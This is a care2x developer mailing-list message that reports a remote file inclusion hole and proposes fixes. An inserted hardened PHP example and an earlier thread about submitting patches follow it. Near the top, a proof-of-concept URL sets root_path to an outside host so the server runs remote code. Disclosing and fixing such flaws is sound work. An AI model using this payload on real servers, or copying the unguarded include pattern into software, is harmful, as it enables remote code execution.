Hello developers,

We found a security flaw that makes it possible to misuse our
care2x. Try this out:
http://<URL>/include/inc_environment_global.php?root_path=http://see-your-ip.info/cmd.do?

(just pass the root_path variable as a GET parameter to the script).
Inside inc_environment_global.php there is just one line like
        require($root_path."whatever");      // or
        require_once($root_path."whatever"); // or
        include($root_path."whatever");

When the PHP setting allow_url_fopen=Yes is enabled, the foreign site will
be included (from the remote location).

1. It is strictly forbidden to expect that critical variables like root_path
will be set by the calling script and be available in the included files.
There must always be a fresh include of roots.php. Seems to fix it...
2. Try to prevent this kind of include file from accepting GET or POST
variables by adding at the top:
        // isset() avoids "undefined index" notices when the parameter is absent
        if (isset($_GET['root_path']) || isset($_POST['root_path'])) die();
-> In this case the script will be stopped when somebody tries to pass
root_path via GET or POST variables. Seems to fix it...
3. You can also set the environment variable allow_url_fopen in the PHP
settings to "no". Seems to fix it...

I made a workaround as described above.
In most parts of the project this is no problem. But exactly here, in the
include folder, the main idea is that the root_path variable is set by the
calling script (like index.php) and the included file (like
include/inc_environment_global.php) uses it without reloading it from the
file roots.php.



Robert


--------------------------------------------
MEROTECH IT Engineering

Robert Meggle
Hohnerstrasse 6
89079 Ulm

Germany

Tel: +49(0)7 31- 1 75 97- 27
Fax: +49(0)7 31- 1 75 97- 25
mailto:[EMAIL PROTECTED]
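
A hardened form of the include pattern described in this message, as an added example that is not care2x code; the location of roots.php, the file layout and the name of the target file are assumptions:

```php
<?php
// Added example, not care2x code. Assumptions (hypothetical): roots.php sets
// $root_path, and this file lives one directory below the installation root.

// 1. Refuse any request that tries to supply root_path itself. isset() avoids
//    "undefined index" notices, and a 400 makes the rejection visible in logs.
if (isset($_GET['root_path']) || isset($_POST['root_path'])) {
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid request');
}

// 2. Never trust an inherited $root_path: load roots.php afresh and check that
//    the value is a local directory inside the installation, not a URL.
function validated_root_path($candidate, $install_dir)
{
    // A scheme prefix of two or more letters (http://, ftp://, php://, data:)
    // is a stream wrapper that allow_url_fopen would honour; a single letter
    // before the colon is a Windows drive and is allowed through.
    if (!is_string($candidate) || preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return false;
    }
    $base = realpath($install_dir);
    $real = realpath($candidate);
    if ($base === false || $real === false || !is_dir($real)) {
        return false;
    }
    // The resolved path must be the installation directory or a subdirectory.
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($real . DIRECTORY_SEPARATOR, $base) !== 0) {
        return false;
    }
    return $real . DIRECTORY_SEPARATOR;
}

require_once __DIR__ . '/../roots.php';   // assumption: roots.php defines $root_path
$root_path = validated_root_path(isset($root_path) ? $root_path : '', __DIR__ . '/..');
if ($root_path === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('root_path is misconfigured');
}
require_once $root_path . 'include/whatever.php';  // "whatever" stands in for the real file
```

With this guard in place, a request carrying root_path is rejected before any include runs, and a root_path that points at a remote URL or outside the installation fails validation even if allow_url_fopen is left on.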

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:care2002-
> [EMAIL PROTECTED] On Behalf Of Kaloyan Raev
> Sent: Thursday, 18 January 2007 11:36
> To: care2002-developers@lists.sourceforge.net
> Subject: Re: [Care2002-developers] questions about submitting patches
> 
> Hi,
> 
> Thank you for contributing a patch.
> 
> If your sf.net user is added to the developer's list of the care2x
> project then you have write access permission for the SVN repository.
> 
> If your sf.net user is not added as developer then please tell me your
> exact sf.net user and I will add you.
> 
> Once you have permission, follow this short guide:
> http://care2x.org/wiki/index.php/Subversion_Guide
> 
> Submit your patch to the main development branch - the /trunk.
> 
> Greetings
> Kaloyan
> 
> On Wed, 2007-01-17 at 10:27 +0100, Gjergj Sheldija wrote:
> > I just forgot to ask in the previous mail,
> >
> > how can I submit patches to the current svn branch?
> >
> >
> > gjergj sheldija
> >
> > -------------------------------------------------------------------------
> > Take Surveys. Earn Cash. Influence the Future of IT
> > Join SourceForge.net's Techsay panel and you'll get the chance to share your
> > opinions on IT & business topics through brief surveys - and earn cash
> > http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
> > _______________________________________________
> > Care2002-developers mailing list
> > Care2002-developers@lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/care2002-developers
> 